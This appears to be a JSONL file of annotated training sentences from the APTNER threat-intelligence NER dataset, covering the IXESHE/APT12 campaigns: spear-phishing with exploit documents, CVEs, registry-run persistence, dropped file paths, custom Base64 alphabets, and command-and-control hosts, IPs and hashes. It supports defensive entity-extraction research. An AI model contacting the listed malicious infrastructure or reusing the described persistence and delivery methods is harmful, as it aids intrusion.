{"text": "Trend Micro generally notifies customers that are believed to have been specifically targeted by APT campaigns .", "spans": {"Organization: Trend Micro": [[0, 11]]}, "info": {"id": "aptner_train_002090", "source": "aptner_train"}}
{"text": "The IXESHE attackers have been actively launching highly targeted attacks since at least July 2009 .", "spans": {"Organization: IXESHE": [[4, 10]]}, "info": {"id": "aptner_train_002091", "source": "aptner_train"}}
{"text": "Available data on the IXESHE campaign indicates that targeted emails with malicious .PDF file attachments were the attackers ’ vector of choice .", "spans": {"Organization: IXESHE": [[22, 28]], "System: emails": [[62, 68]], "Indicator: .PDF": [[84, 88]]}, "info": {"id": "aptner_train_002092", "source": "aptner_train"}}
{"text": "In most cases , the attacks involved Adobe Acrobat , Reader , and Flash Player exploits such as : CVE-2009-4324 , CVE-2009-0927 , CVE-2011-0609 , CVE-2011-0611 .", "spans": {"System: Adobe Acrobat": [[37, 50]], "System: Reader": [[53, 59]], "System: Flash Player": [[66, 78]], "Vulnerability: CVE-2009-4324": [[98, 111]], "Vulnerability: CVE-2009-0927": [[114, 127]], "Vulnerability: CVE-2011-0609": [[130, 143]], "Vulnerability: CVE-2011-0611": [[146, 159]]}, "info": {"id": "aptner_train_002093", "source": "aptner_train"}}
{"text": "It should also be noted that this campaign used CVE-2009-4324 and CVE-2011-0609 exploits when these were still unpatched or considered zero-day vulnerabilities .", "spans": {"Vulnerability: CVE-2009-4324": [[48, 61]], "Vulnerability: CVE-2011-0609": [[66, 79]], "Vulnerability: zero-day": [[135, 143]]}, "info": {"id": "aptner_train_002094", "source": "aptner_train"}}
{"text": "The IXESHE attackers also used an exploit that affected Microsoft Excel — CVE-2009-3129 .", "spans": {"Organization: IXESHE": [[4, 10]], "Organization: Microsoft": [[56, 65]], "System: Excel": [[66, 71]], "Vulnerability: CVE-2009-3129": [[74, 87]]}, "info": {"id": "aptner_train_002095", "source": "aptner_train"}}
{"text": "Every IXESHE case we examined revealed that the original infection vector was a targeted email with a PDF exploit as attachment .", "spans": {"Organization: IXESHE": [[6, 12]], "System: email": [[89, 94]], "System: PDF": [[102, 105]]}, "info": {"id": "aptner_train_002096", "source": "aptner_train"}}
{"text": "Older versions also used an XLS exploit .", "spans": {"System: XLS": [[28, 31]]}, "info": {"id": "aptner_train_002097", "source": "aptner_train"}}
{"text": "Opening the .PDF file drops and executes a malware in a victim ’s system .", "spans": {"Indicator: .PDF": [[12, 16]]}, "info": {"id": "aptner_train_002098", "source": "aptner_train"}}
{"text": "The malware displays a blank .PDF file or a decoy document related to the targeted attack .", "spans": {}, "info": {"id": "aptner_train_002099", "source": "aptner_train"}}
{"text": "The emails normally come from compromised personal accounts or are entirely spoofed .", "spans": {"System: emails": [[4, 10]]}, "info": {"id": "aptner_train_002100", "source": "aptner_train"}}
{"text": "emails from spoofed senders were usually sent via mail servers in the United States and China .", "spans": {"System: emails": [[0, 6]]}, "info": {"id": "aptner_train_002101", "source": "aptner_train"}}
{"text": "The malware also sets the executable file ’s attributes to “ Hidden. ” Some of the file names the attackers used include : winhlps.exe , acrotry.exe , AcroRd32.exe , Updater.exe .", "spans": {"Indicator: winhlps.exe": [[123, 134]], "Indicator: acrotry.exe": [[137, 148]], "Indicator: AcroRd32.exe": [[151, 163]], "Indicator: Updater.exe": [[166, 177]]}, "info": {"id": "aptner_train_002102", "source": "aptner_train"}}
{"text": "In order for the malware to survive rebooting , it normally creates the following registry run key : HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run .", "spans": {}, "info": {"id": "aptner_train_002103", "source": "aptner_train"}}
{"text": "The registry run key , in turn , points to the malware that has been dropped .", "spans": {}, "info": {"id": "aptner_train_002104", "source": "aptner_train"}}
{"text": "The value name of this entry varies from sample to sample .", "spans": {}, "info": {"id": "aptner_train_002105", "source": "aptner_train"}}
{"text": "Some of the names the attackers used for it include : Adobe Assistant , Migrated .", "spans": {"System: Adobe Assistant": [[54, 69]], "System: Migrated": [[72, 80]]}, "info": {"id": "aptner_train_002106", "source": "aptner_train"}}
{"text": "Upon installation , the malware starts communicating with one of its C&C servers .", "spans": {"System: C&C": [[69, 72]]}, "info": {"id": "aptner_train_002107", "source": "aptner_train"}}
{"text": "Most of the samples appeared to have at least three C&C servers hard coded for redundancy .", "spans": {"System: C&C": [[52, 55]]}, "info": {"id": "aptner_train_002108", "source": "aptner_train"}}
{"text": "Some samples alternatively use an FGKD.jsp or an FPK.jsp file .", "spans": {"Indicator: FGKD.jsp": [[34, 42]], "Indicator: FPK.jsp": [[49, 56]]}, "info": {"id": "aptner_train_002109", "source": "aptner_train"}}
{"text": "The Base64 blob is of particular interest .", "spans": {}, "info": {"id": "aptner_train_002110", "source": "aptner_train"}}
{"text": "It makes use of a custom Base64 alphabet .", "spans": {}, "info": {"id": "aptner_train_002111", "source": "aptner_train"}}
{"text": "Once decoded , this blob reveals a standardized structure of the information sent to the registered C&C server , which includes the following details : Computer name , Local IP address , Proxy server IP and port , Malware ID .", "spans": {"System: C&C": [[100, 103]]}, "info": {"id": "aptner_train_002112", "source": "aptner_train"}}
{"text": "To date , we have seen several custom Base64 alphabets , including : +NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA , HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we mKckJLBofCDrs9VtWXlEu , p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ zPgUx67FMhYb8q3wemKc , aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu .", "spans": {}, "info": {"id": "aptner_train_002113", "source": "aptner_train"}}
{"text": "Some similarities exist across different versions of the Base64 alphabet , which indicates that these are most likely not completely randomly generated .", "spans": {}, "info": {"id": "aptner_train_002114", "source": "aptner_train"}}
{"text": "Instead , the attackers manually cut and pasted older versions after altering some parts .", "spans": {}, "info": {"id": "aptner_train_002115", "source": "aptner_train"}}
{"text": "The malware ID seems to be a campaign code with a different IP address for each attack .", "spans": {}, "info": {"id": "aptner_train_002116", "source": "aptner_train"}}
{"text": "Some of the campaign codes we have seen include : CRML_0505 , CRML_MIL , Firebox4 , JUST_0525 , ML0628 , MW0629 , OM222 .", "spans": {"Malware: CRML_0505": [[50, 59]], "Malware: CRML_MIL": [[62, 70]], "Malware: Firebox4": [[73, 81]], "Malware: JUST_0525": [[84, 93]], "Malware: ML0628": [[96, 102]], "Malware: MW0629": [[105, 111]], "Malware: OM222": [[114, 119]]}, "info": {"id": "aptner_train_002117", "source": "aptner_train"}}
{"text": "The IXESHE campaign has been successfully executing targeted attacks since 2009 .", "spans": {"Organization: IXESHE": [[4, 10]]}, "info": {"id": "aptner_train_002118", "source": "aptner_train"}}
{"text": "The attackers primarily use malicious .PDF files that exploit vulnerabilities in Adobe Reader , Acrobat , and Flash Player , including the use of two zero-day exploits—one in 2009 and another in 2011 .", "spans": {"Indicator: .PDF": [[38, 42]], "System: Adobe Reader": [[81, 93]], "System: Acrobat": [[96, 103]], "System: Flash Player": [[110, 122]], "Vulnerability: zero-day": [[150, 158]]}, "info": {"id": "aptner_train_002119", "source": "aptner_train"}}
{"text": "While the attackers primarily targeted East Asian governments in the past , they have also started targeting a telecommunications company and electronics manufacturers .", "spans": {}, "info": {"id": "aptner_train_002120", "source": "aptner_train"}}
{"text": "They kept track of their targeted attacks by embedding a “ campaign tag ” in the malware that appears to describe when each attack was launched and , in some cases , the nature of its target .", "spans": {}, "info": {"id": "aptner_train_002121", "source": "aptner_train"}}
{"text": "We found more than 40 of these campaign tags .", "spans": {}, "info": {"id": "aptner_train_002122", "source": "aptner_train"}}
{"text": "The IXESHE attackers are notable for their use of compromised machines within a target ’s internal network as C&C servers .", "spans": {"Organization: IXESHE": [[4, 10]], "System: C&C": [[110, 113]]}, "info": {"id": "aptner_train_002123", "source": "aptner_train"}}
{"text": "This helped disguise their activities .", "spans": {}, "info": {"id": "aptner_train_002124", "source": "aptner_train"}}
{"text": "In addition , the attackers ’ use of the proxy tool , HTran , also helped mask their true location .", "spans": {"System: HTran": [[54, 59]]}, "info": {"id": "aptner_train_002125", "source": "aptner_train"}}
{"text": "While their identities remain unknown , the attackers behind the IXESHE campaign demonstrated that they were both determined and capable .", "spans": {"Organization: IXESHE": [[65, 71]]}, "info": {"id": "aptner_train_002126", "source": "aptner_train"}}
{"text": "While the malware used in the attacks were not very complicated by nature , these proved very effective .", "spans": {}, "info": {"id": "aptner_train_002127", "source": "aptner_train"}}
{"text": "APT12 .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002128", "source": "aptner_train"}}
{"text": "The attackers referred to as APT12 ( also known as IXESHE , DynCalc , and DNSCALC ) recently started a new campaign targeting organizations in Japan and Taiwan .", "spans": {"Organization: APT12": [[29, 34]], "Organization: IXESHE": [[51, 57]], "Organization: DynCalc": [[60, 67]], "Organization: DNSCALC": [[74, 81]]}, "info": {"id": "aptner_train_002129", "source": "aptner_train"}}
{"text": "APT12 is believed to be a cyber espionage group thought to have links to the Chinese People's Liberation Army .", "spans": {"Organization: APT12": [[0, 5]], "Organization: Chinese People's Liberation Army": [[77, 109]]}, "info": {"id": "aptner_train_002130", "source": "aptner_train"}}
{"text": "APT12 's targets are consistent with larger People's Republic of China ( PRC ) goals .", "spans": {"Organization: APT12": [[0, 5]], "Organization: People's Republic of China": [[44, 70]], "Organization: PRC": [[73, 76]]}, "info": {"id": "aptner_train_002131", "source": "aptner_train"}}
{"text": "Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan .", "spans": {"Organization: PRC": [[66, 69]]}, "info": {"id": "aptner_train_002132", "source": "aptner_train"}}
{"text": "Additionally , the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure , as APT12 used the same strategy after compromising the New York Times in Oct 2012 .", "spans": {"Organization: APT12": [[158, 163]], "Organization: New York Times": [[210, 224]]}, "info": {"id": "aptner_train_002133", "source": "aptner_train"}}
{"text": "Much like Darwin ’s theory of biological evolution , APT12 been forced to evolve and adapt in order to maintain its mission .", "spans": {"Organization: APT12": [[53, 58]]}, "info": {"id": "aptner_train_002134", "source": "aptner_train"}}
{"text": "FireEye researchers discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT .", "spans": {"Organization: FireEye": [[0, 7]], "Malware: THREEBYTE": [[101, 110]], "Malware: WATERSPOUT": [[115, 125]]}, "info": {"id": "aptner_train_002135", "source": "aptner_train"}}
{"text": "Both backdoors were dropped from malicious documents built utilizing the “ Tran Duy Linh ” exploit kit , which exploited CVE-2012-0158 .", "spans": {"System: Tran Duy Linh": [[75, 88]], "Vulnerability: CVE-2012-0158": [[121, 134]]}, "info": {"id": "aptner_train_002136", "source": "aptner_train"}}
{"text": "These documents were also emailed to organizations in Japan and Taiwan .", "spans": {}, "info": {"id": "aptner_train_002137", "source": "aptner_train"}}
{"text": "While APT12 has previously used THREEBYTE , it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE .", "spans": {"Organization: APT12": [[6, 11], [61, 66]], "Malware: THREEBYTE": [[32, 41], [130, 139]]}, "info": {"id": "aptner_train_002138", "source": "aptner_train"}}
{"text": "Similarly , WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified .", "spans": {"Malware: WATERSPOUT": [[12, 22]]}, "info": {"id": "aptner_train_002139", "source": "aptner_train"}}
{"text": "However , the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12 .", "spans": {"Malware: WATERSPOUT": [[14, 24]], "Malware: RIPTIDE": [[65, 72]], "Malware: HIGHTIDE": [[77, 85]], "Organization: APT12": [[122, 127]]}, "info": {"id": "aptner_train_002140", "source": "aptner_train"}}
{"text": "From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE , a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": {"Organization: FireEye": [[31, 38]], "Organization: APT12": [[48, 53]], "Malware: RIPTIDE": [[64, 71]], "System: command and control": [[140, 159]], "System: C2": [[162, 164]]}, "info": {"id": "aptner_train_002141", "source": "aptner_train"}}
{"text": "RIPTIDE ’s first communication with its C2 server fetches an encryption key , and the RC4 encryption key is used to encrypt all further communication .", "spans": {"Malware: RIPTIDE": [[0, 7]], "System: C2": [[40, 42]]}, "info": {"id": "aptner_train_002142", "source": "aptner_train"}}
{"text": "In June 2014, Arbor Networks published an article describing the RIPTIDE backdoor and its C2 infrastructure in great depth .", "spans": {"Organization: Arbor": [[14, 19]], "Malware: RIPTIDE backdoor": [[65, 81]], "System: C2": [[90, 92]]}, "info": {"id": "aptner_train_002143", "source": "aptner_train"}}
{"text": "The blog highlighted that the backdoor was utilized in campaigns from March 2011 till May 2014 .", "spans": {}, "info": {"id": "aptner_train_002144", "source": "aptner_train"}}
{"text": "Following the release of the article , FireEye observed a distinct change in RIPTIDE ’s protocols and strings .", "spans": {"Organization: FireEye": [[39, 46]], "Malware: RIPTIDE": [[77, 84]]}, "info": {"id": "aptner_train_002145", "source": "aptner_train"}}
{"text": "We suspect this change was a direct result of the Arbor blog post in order to decrease detection of RIPTIDE by security vendors .", "spans": {"Organization: Arbor": [[50, 55]], "Malware: RIPTIDE": [[100, 107]]}, "info": {"id": "aptner_train_002146", "source": "aptner_train"}}
{"text": "The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules .", "spans": {"Malware: RIPTIDE": [[15, 22], [70, 77]]}, "info": {"id": "aptner_train_002147", "source": "aptner_train"}}
{"text": "FireEye dubbed this new malware family HIGHTIDE .", "spans": {"Organization: FireEye": [[0, 7]], "Malware: HIGHTIDE": [[39, 47]]}, "info": {"id": "aptner_train_002148", "source": "aptner_train"}}
{"text": "On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry .", "spans": {"System: email": [[52, 57]], "Organization: Taiwanese government": [[68, 88]]}, "info": {"id": "aptner_train_002149", "source": "aptner_train"}}
{"text": "Attached to this email was a malicious Microsoft Word document ( MD5: f6fafb7c30b1114befc93f39d0698560 ) that exploited CVE-2012-0158 .", "spans": {"System: email": [[17, 22]], "Organization: Microsoft": [[39, 48]], "System: Word": [[49, 53]], "Indicator: f6fafb7c30b1114befc93f39d0698560": [[70, 102]], "Vulnerability: CVE-2012-0158": [[120, 133]]}, "info": {"id": "aptner_train_002150", "source": "aptner_train"}}
{"text": "It is worth noting that this email appeared to have been sent from another Taiwanese Government employee , implying that the email was sent from a valid but compromised account .", "spans": {"System: email": [[29, 34], [125, 130]], "Organization: Taiwanese Government": [[75, 95]]}, "info": {"id": "aptner_train_002151", "source": "aptner_train"}}
{"text": "HIGHTIDE : 6e59861931fa2796ee107dc27bfdd480 .", "spans": {"Malware: HIGHTIDE": [[0, 8]], "Indicator: 6e59861931fa2796ee107dc27bfdd480": [[11, 43]]}, "info": {"id": "aptner_train_002152", "source": "aptner_train"}}
{"text": "The HIGHTIDE backdoor connected directly to 141.108.2.157 .", "spans": {"Malware: HIGHTIDE backdoor": [[4, 21]], "Indicator: 141.108.2.157": [[44, 57]]}, "info": {"id": "aptner_train_002153", "source": "aptner_train"}}
{"text": "If you compare the HTTP GET request from the RIPTIDE samples to the HTTP GET request from the HIGHTIDE samples you can see the malware author changed the following items : User Agent , Format and structure of the HTTP Uniform Resource Identifier ( URI ) .", "spans": {"Malware: RIPTIDE": [[45, 52]], "Malware: HIGHTIDE": [[94, 102]], "System: Uniform Resource Identifier": [[218, 245]], "System: URI": [[248, 251]]}, "info": {"id": "aptner_train_002154", "source": "aptner_train"}}
{"text": "FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: APT12": [[17, 22]], "System: emails": [[68, 74]]}, "info": {"id": "aptner_train_002156", "source": "aptner_train"}}
{"text": "Based on past APT12 activity , we expect the threat group to continue to utilize phishing as a malware delivery method . 0824.1.doc : f6fafb7c30b1114befc93f39d0698560 , CVE-2012-0158 .", "spans": {"Organization: APT12": [[14, 19]], "Indicator: 0824.1.doc": [[121, 131]], "Indicator: f6fafb7c30b1114befc93f39d0698560": [[134, 166]], "Vulnerability: CVE-2012-0158": [[169, 182]]}, "info": {"id": "aptner_train_002157", "source": "aptner_train"}}
{"text": "Jason_invitation.doc : 00a95fb30be2d6271c491545f6c6a707 , CVE-2012-0158 .", "spans": {"Indicator: Jason_invitation.doc": [[0, 20]], "Indicator: 00a95fb30be2d6271c491545f6c6a707": [[23, 55]], "Vulnerability: CVE-2012-0158": [[58, 71]]}, "info": {"id": "aptner_train_002158", "source": "aptner_train"}}
{"text": "When the file is opened , it drops HIGHTIDE in the form of an executable file onto the infected system .", "spans": {"Malware: HIGHTIDE": [[35, 43]]}, "info": {"id": "aptner_train_002159", "source": "aptner_train"}}
{"text": "RIPTIDE and HIGHTIDE differ on several points : executable file location , image base address , the User-Agent within the GET requests , and the format of the URI .", "spans": {"Malware: RIPTIDE": [[0, 7]], "Malware: HIGHTIDE": [[12, 20]], "System: URI": [[159, 162]]}, "info": {"id": "aptner_train_002160", "source": "aptner_train"}}
{"text": "The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder .", "spans": {"Malware: RIPTIDE": [[4, 11]], "Malware: HIGHTIDE": [[140, 148]]}, "info": {"id": "aptner_train_002161", "source": "aptner_train"}}
{"text": "All but one sample that we identified were written to this folder as word.exe .", "spans": {"Indicator: word.exe": [[69, 77]]}, "info": {"id": "aptner_train_002162", "source": "aptner_train"}}
{"text": "The one outlier was written as winword.exe .", "spans": {"Indicator: winword.exe": [[31, 42]]}, "info": {"id": "aptner_train_002163", "source": "aptner_train"}}
{"text": "Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28 .", "spans": {"Malware: HIGHTIDE": [[19, 27]], "Organization: APT12": [[46, 51]], "Organization: Taiwanese Government": [[70, 90]]}, "info": {"id": "aptner_train_002164", "source": "aptner_train"}}
{"text": "On Monday August 25, 2014 we observed a different spear phish email sent from lilywang823@gmail.com to a technology company located in Taiwan .", "spans": {"System: email": [[62, 67]], "Indicator: lilywang823@gmail.com": [[78, 99]]}, "info": {"id": "aptner_train_002165", "source": "aptner_train"}}
{"text": "This spear phish contained a malicious Word document that exploited CVE-2012-0158 .", "spans": {"System: Word": [[39, 43]], "Vulnerability: CVE-2012-0158": [[68, 81]]}, "info": {"id": "aptner_train_002166", "source": "aptner_train"}}
{"text": "The MD5 of the exploit document was e009b95ff7b69cbbebc538b2c5728b11 .", "spans": {"Indicator: e009b95ff7b69cbbebc538b2c5728b11": [[36, 68]]}, "info": {"id": "aptner_train_002167", "source": "aptner_train"}}
{"text": "Similar to the newly discovered HIGHTIDE samples documented above , this malicious document dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe .", "spans": {"Malware: HIGHTIDE": [[32, 40]], "Indicator: SETTINGS\\Temp\\word.exe": [[153, 175]]}, "info": {"id": "aptner_train_002168", "source": "aptner_train"}}
{"text": "THREEBYTE : 16e627dbe730488b1c3d448bfc9096e2 .", "spans": {"Malware: THREEBYTE": [[0, 9]], "Indicator: 16e627dbe730488b1c3d448bfc9096e2": [[12, 44]]}, "info": {"id": "aptner_train_002169", "source": "aptner_train"}}
{"text": "This backdoor sent the following callback traffic to video.csmcpr.com .", "spans": {"Indicator: video.csmcpr.com": [[53, 69]]}, "info": {"id": "aptner_train_002170", "source": "aptner_train"}}
{"text": "The THREEBYTE spear phishing incident ( while not yet attributed ) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12 : The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors ;", "spans": {"Malware: THREEBYTE": [[4, 13]], "Malware: HIGHTIDE": [[119, 127]], "Organization: APT12": [[151, 156]], "Malware: THREEBYTE backdoor": [[163, 181]], "Malware: HIGHTIDE backdoors": [[214, 232]]}, "info": {"id": "aptner_train_002171", "source": "aptner_train"}}
{"text": "Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan ;", "spans": {"Malware: THREEBYTE": [[9, 18]], "Malware: HIGHTIDE backdoors": [[23, 41]]}, "info": {"id": "aptner_train_002172", "source": "aptner_train"}}
{"text": "Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe ;", "spans": {"Malware: THREEBYTE": [[9, 18]], "Malware: HIGHTIDE backdoors": [[23, 41]], "Indicator: SETTINGS\\Temp\\word.exe": [[118, 140]]}, "info": {"id": "aptner_train_002173", "source": "aptner_train"}}
{"text": "APT12 has previously used the THREEBYTE backdoor .", "spans": {"Organization: APT12": [[0, 5]], "Malware: THREEBYTE backdoor": [[30, 48]]}, "info": {"id": "aptner_train_002174", "source": "aptner_train"}}
{"text": "On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan .", "spans": {"System: emails": [[64, 70]]}, "info": {"id": "aptner_train_002175", "source": "aptner_train"}}
{"text": "Attached to this email was another malicious document that was designed to exploit CVE-2012-0158 .", "spans": {"System: email": [[17, 22]], "Vulnerability: CVE-2012-0158": [[83, 96]]}, "info": {"id": "aptner_train_002176", "source": "aptner_train"}}
{"text": "This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe .", "spans": {"Indicator: 499bec15ac83f2c8998f03917b63652e": [[43, 75]], "Indicator: SETTINGS\\Temp\\word.exe": [[141, 163]]}, "info": {"id": "aptner_train_002177", "source": "aptner_train"}}
{"text": "The backdoor had the following properties :", "spans": {}, "info": {"id": "aptner_train_002178", "source": "aptner_train"}}
{"text": "WATERSPOUT :", "spans": {"Malware: WATERSPOUT": [[0, 10]]}, "info": {"id": "aptner_train_002179", "source": "aptner_train"}}
{"text": "f9cfda6062a8ac9e332186a7ec0e706a .", "spans": {"Indicator: f9cfda6062a8ac9e332186a7ec0e706a": [[0, 32]]}, "info": {"id": "aptner_train_002180", "source": "aptner_train"}}
{"text": "The backdoor connects to a command and control server at icc.ignorelist.com .", "spans": {"Indicator: icc.ignorelist.com": [[57, 75]]}, "info": {"id": "aptner_train_002181", "source": "aptner_train"}}
{"text": "Similar to RIPTIDE and HIGHTIDE , the WATERSPOUT backdoor is an HTTP based backdoor that communicates with its C2 server .", "spans": {"Malware: RIPTIDE": [[11, 18]], "Malware: HIGHTIDE": [[23, 31]], "Malware: WATERSPOUT backdoor": [[38, 57]], "System: C2": [[111, 113]]}, "info": {"id": "aptner_train_002182", "source": "aptner_train"}}
{"text": "Although there are no current infrastructure ties to link this backdoor to APT12 , there are several data points that show a possible tie to the same actors :", "spans": {"Organization: APT12": [[75, 80]]}, "info": {"id": "aptner_train_002183", "source": "aptner_train"}}
{"text": "Same initial delivery method ( spear phishing email ) with a Microsoft Word Document exploiting CVE-2012-0158 .", "spans": {"System: email": [[46, 51]], "Organization: Microsoft": [[61, 70]], "System: Word": [[71, 75]], "Vulnerability: CVE-2012-0158": [[96, 109]]}, "info": {"id": "aptner_train_002184", "source": "aptner_train"}}
{"text": "The same “ Tran Duy Linh ” Microsoft Word Exploit Kit was used in delivery of this backdoor .", "spans": {"System: Tran Duy Linh": [[11, 24]], "Organization: Microsoft": [[27, 36]], "System: Word": [[37, 41]]}, "info": {"id": "aptner_train_002185", "source": "aptner_train"}}
{"text": "Similar Targets were observed where the threat actors utilized this backdoor : Japanese Tech Company , Taiwanese Government Organizations , Organizations in the Asia-Pacific Region that are of Interest to China .", "spans": {"Organization: Japanese Tech Company": [[79, 100]], "Organization: Taiwanese Government": [[103, 123]]}, "info": {"id": "aptner_train_002186", "source": "aptner_train"}}
{"text": "The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword.exe .", "spans": {"Malware: WATERSPOUT backdoor": [[4, 23]], "Malware: HIGHTIDE backdoors": [[65, 83]], "Indicator: SETTINGS\\Temp\\word.exe": [[125, 147]], "Indicator: SETTINGS\\Temp\\winword.exe": [[189, 214]]}, "info": {"id": "aptner_train_002187", "source": "aptner_train"}}
{"text": "WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor .", "spans": {"Malware: WATERSPOUT": [[0, 10]], "Malware: HIGHTIDE backdoor": [[52, 69]], "Malware: THREEBYTE backdoor": [[97, 115]]}, "info": {"id": "aptner_train_002188", "source": "aptner_train"}}
{"text": "APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002189", "source": "aptner_train"}}
{"text": "APT12 has the ability to adapt quickly to public exposures with new tools , tactics , and procedures ( TTPs ) .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002190", "source": "aptner_train"}}
{"text": "Public disclosures may result in an immediate change in APT12 ’s tools .", "spans": {"Organization: APT12": [[56, 61]]}, "info": {"id": "aptner_train_002191", "source": "aptner_train"}}
{"text": "These changes may be temporary and FireEye believes they are aimed at decreasing detection of their tools until a more permanent and effective TTP change can be implemented ( e.g. , WATERSPOUT ) .", "spans": {"Organization: FireEye": [[35, 42]], "Malware: WATERSPOUT": [[182, 192]]}, "info": {"id": "aptner_train_002192", "source": "aptner_train"}}
{"text": "Although these points do not definitively tie WATERSPOUT to APT12 , they do indicate a possible connection between the WATERSPOUT campaign , the THREEBYTE campaign , and the HIGHTIDE campaign attributed to APT12 .", "spans": {"Malware: WATERSPOUT": [[46, 56], [119, 129]], "Organization: APT12": [[60, 65], [206, 211]], "Malware: THREEBYTE": [[145, 154]], "Malware: HIGHTIDE": [[174, 182]]}, "info": {"id": "aptner_train_002193", "source": "aptner_train"}}
{"text": "These development efforts may have resulted in the emergence of the WATERSPOUT backdoor .", "spans": {"Malware: WATERSPOUT backdoor": [[68, 87]]}, "info": {"id": "aptner_train_002195", "source": "aptner_train"}}
{"text": "Though public disclosures resulted in APT12 adaptations , FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels .", "spans": {"Organization: APT12": [[38, 43], [97, 102]], "Organization: FireEye": [[58, 65]]}, "info": {"id": "aptner_train_002196", "source": "aptner_train"}}
{"text": "Similarly , the public disclosure of APT12 ’s intrusion at the New York Times also led to only a brief pause in the threat group ’s activity and immediate changes in TTPs .", "spans": {"Organization: APT12": [[37, 42]], "Organization: New York Times": [[63, 77]]}, "info": {"id": "aptner_train_002197", "source": "aptner_train"}}
{"text": "The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report .", "spans": {"Organization: APT12": [[27, 32]], "Organization: Mandiant": [[52, 60]], "Organization: M-Trends": [[66, 74]]}, "info": {"id": "aptner_train_002198", "source": "aptner_train"}}
{"text": "Currently , APT12 continues to target organizations and conduct cyber operations using its new tools .", "spans": {"Organization: APT12": [[12, 17]]}, "info": {"id": "aptner_train_002199", "source": "aptner_train"}}
{"text": "Most recently , FireEye observed HIGHTIDE at multiple Taiwan-based organizations and the suspected APT12 WATERSPOUT backdoor at a Japan-based electronics company .", "spans": {"Organization: FireEye": [[16, 23]], "Malware: HIGHTIDE": [[33, 41]], "Organization: APT12": [[99, 104]], "Malware: WATERSPOUT backdoor": [[105, 124]]}, "info": {"id": "aptner_train_002200", "source": "aptner_train"}}
{"text": "APT12 .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002201", "source": "aptner_train"}}
{"text": "The attackers behind the breach of the New York Times ’ computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware .", "spans": {"Organization: New York Times": [[39, 53]]}, "info": {"id": "aptner_train_002202", "source": "aptner_train"}}
{"text": "The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": {}, "info": {"id": "aptner_train_002203", "source": "aptner_train"}}
{"text": "The newest campaign uses updated versions of Aumlib and Ixeshe .", "spans": {"Malware: Aumlib": [[45, 51]], "Malware: Ixeshe": [[56, 62]]}, "info": {"id": "aptner_train_002204", "source": "aptner_train"}}
{"text": "Aumlib , which for years has been used in targeted attacks , now encodes certain HTTP communications .", "spans": {"Malware: Aumlib": [[0, 6]]}, "info": {"id": "aptner_train_002205", "source": "aptner_train"}}
{"text": "FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "aptner_train_002206", "source": "aptner_train"}}
{"text": "And a new version of Ixeshe , which has been in service since 2009 to attack targets in East Asia , uses new network traffic patterns , possibly to evade traditional network security systems .", "spans": {"Malware: Ixeshe": [[21, 27]]}, "info": {"id": "aptner_train_002207", "source": "aptner_train"}}
{"text": "The updates are significant for both of the longstanding malware families ; before this year , Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 .", "spans": {"Malware: Aumlib": [[95, 101]]}, "info": {"id": "aptner_train_002208", "source": "aptner_train"}}
